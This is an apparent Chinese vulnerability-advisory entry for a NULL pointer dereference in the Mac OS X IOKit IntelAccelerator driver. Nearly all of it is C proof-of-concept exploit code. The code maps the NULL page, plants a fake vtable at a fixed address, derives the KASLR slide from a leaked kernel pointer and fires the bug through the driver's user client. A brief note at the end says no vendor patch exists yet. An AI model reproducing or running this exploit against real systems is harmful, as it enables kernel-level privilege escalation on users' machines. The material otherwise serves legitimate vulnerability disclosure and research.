Apple Mac OS X IOKit IntelAccelerator 空指针解引用（NULL pointer dereference）本地漏洞 (4) —— 利用 PoC 代码

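/*
 * Stage the fake vtable in user memory, map the NULL page so that the kernel's
 * NULL read below picks up a pointer to it, and then poke the IntelAccelerator
 * user client so the bug fires.
 *
 * vtable / vtable_len: the bytes copied to 0x41420000 (built by the caller
 * from the KASLR slide). The copy is refused if the buffer is empty or does
 * not fit in the pages reserved above that address.
 *
 * Every Mach/IOKit call that the later steps depend on is checked; a failure
 * is reported and the function returns instead of writing through an
 * address that never got mapped (which would just be a plain segfault with
 * no diagnostic).
 */
void trigger(void* vtable, size_t vtable_len){
  const mach_vm_address_t fake_vtable_addr = 0x41420000;
  const mach_vm_size_t page_size = 0x1000;
  const mach_vm_size_t lead_size = 10 * page_size;          /* pages reserved below the fake vtable */
  const mach_vm_size_t region_size = 0x20 * page_size;      /* whole fixed region, lead pages included */
  kern_return_t err;

  /* The copy below must stay inside the fixed region: 0x20 pages minus the
   * 10 that sit below 0x41420000. */
  if (vtable == NULL || vtable_len == 0 || vtable_len > region_size - lead_size) {
    printf("trigger: vtable is empty or exceeds the 0x%llx bytes reserved at 0x%llx\n",
           (unsigned long long)(region_size - lead_size),
           (unsigned long long)fake_vtable_addr);
    return;
  }

  /* Need to over-allocate and touch the pages, since the kernel will later
   * treat this area as a stack. flags == 0 is a fixed-address allocation, so
   * either we get exactly this address or the call fails. */
  mach_vm_address_t addr = fake_vtable_addr - lead_size;
  err = mach_vm_allocate(mach_task_self(), &addr, region_size, 0);
  if (err != 0 /* KERN_SUCCESS */ || addr != fake_vtable_addr - lead_size) {
    printf("trigger: mach_vm_allocate at 0x%llx failed: 0x%x\n",
           (unsigned long long)(fake_vtable_addr - lead_size), (unsigned)err);
    return;
  }
  /* addr is an integer address type; cast explicitly rather than relying on
   * an implicit integer-to-pointer conversion. */
  memset((void*)addr, 0, region_size);
  memcpy((void*)fake_vtable_addr, vtable, vtable_len);

  /* Map the NULL page.
   * NOTE(review): on a 64-bit build this only succeeds if __PAGEZERO was
   * shrunk at link time (e.g. -pagezero_size) -- confirm the build flags. */
  vm_deallocate(mach_task_self(), 0x0, page_size);
  addr = 0;
  err = vm_allocate(mach_task_self(), &addr, page_size, 0);
  if (err != 0 /* KERN_SUCCESS */ || addr != 0) {
    printf("trigger: could not map the NULL page: 0x%x (got 0x%llx)\n",
           (unsigned)err, (unsigned long long)addr);
    return;
  }

  /* Touch the page through a pointer derived from the vm_allocate result
   * rather than a literal 0: a store through a known-null constant is
   * undefined behaviour that an optimising compiler may turn into a trap. */
  volatile char* null_page = (volatile char*)addr;
  for (mach_vm_size_t i = 0; i < page_size; i++) {
    null_page[i] = 'A';
  }
  /* The kernel's NULL read yields this value: the address of the fake vtable. */
  volatile uint64_t* zero = (volatile uint64_t*)addr;
  *zero = fake_vtable_addr;

  /* Trigger the bug through the IntelAccelerator user client (type 2). */
  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  io_iterator_t iterator = 0;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != 0 /* KERN_SUCCESS */) {
    printf("trigger: IOServiceGetMatchingServices failed: 0x%x\n", (unsigned)err);
    return;
  }

  io_service_t service = IOIteratorNext(iterator);
  if (service == MACH_PORT_NULL) {
    printf("trigger: no IntelAccelerator service found\n");
    return;
  }
  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  if (err != 0 /* KERN_SUCCESS */) {
    printf("trigger: IOServiceOpen failed: 0x%x\n", (unsigned)err);
    return;
  }

  addr = 0x12345000;
  mach_vm_size_t size = page_size;
  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  /* Reaching this line means the mapping call returned to user space. */
  printf("trigger: IOConnectMapMemory returned 0x%x\n", (unsigned)err);
}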

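/*
 * Entry point: recover the KASLR slide of the kext from a leaked pointer,
 * build the fake vtable for that slide and hand it to trigger().
 *
 * Returns 1 when the leaked pointer fails the low-12-bit sanity check or
 * when no vtable could be built, 0 otherwise.
 */
int main(void) {
  uint64_t leaked_ptr = leak();
  uint64_t kext_load_addr = load_addr();

  /* Offset of the leaked pointer inside the (unslid) kext. */
  uint64_t offset = leaked_offset_in_kext();

  /* The slide is page-granular, so the low 12 bits of the leaked pointer
   * must agree with those of the symbol offset. */
  if ((leaked_ptr & 0xfff) != (offset & 0xfff)) {
    printf("the leaked pointer doesn't match up with the expected symbol offset\n");
    return 1;
  }

  uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;

  /* %p expects a pointer argument; print the integer slide as hex instead. */
  printf("kaslr slide: 0x%llx\n", (unsigned long long)kaslr_slide);

  size_t vtable_len = 0;
  void* vtable = build_vtable(kaslr_slide, &vtable_len);
  /* Whatever build_vtable's failure convention is, a NULL or empty result is
   * not something worth copying into the fake-vtable region. */
  if (vtable == NULL || vtable_len == 0) {
    printf("failed to build the fake vtable\n");
    return 1;
  }

  trigger(vtable, vtable_len);

  return 0;
}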

建议:
厂商补丁:

Apple
 -----
目前（截至本文发布时）厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的安全更新页面以获取最新版本：
